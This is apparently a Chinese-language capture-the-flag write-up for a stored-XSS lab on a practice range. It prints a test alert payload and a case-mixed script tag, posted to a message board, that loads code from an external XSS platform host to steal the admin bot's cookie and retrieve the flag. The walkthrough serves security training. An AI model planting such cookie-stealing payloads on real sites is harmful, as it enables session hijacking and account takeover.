URL:封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 (zkaq.cn)
测试是否存在xss漏洞
<script>alert(1111)</script>
成功弹窗,存在xss,由tips可知这题是一道存储型XSS偷取cookie的题目,既是存储型偷取cookie,就需要xss平台,找一个网上的xss平台,这里使用:XSS平台-XSS安全测试平台
(当管理员查看留言页面时触发xss,将管理员的cookie发送到该平台上面,从而实现利用管理员的cookie进行伪造目标权限。)
注册,登录
创建一个项目
项目名称、项目描述随意写
下一步, 选择这两项。
复制</tExtArEa>'"><sCRiPt sRC=//xss8.cc/9Fj3></sCrIpT>到留言板
因为xss bot 每10秒访问一次页面,相当于管理员每10秒看一次留言,触发一次xss代码,所以在10秒后,xss平台接收到了目标的cookie,在其中读取到了flag,点击项目内容
勾选展开,在cookie中便可看到flag.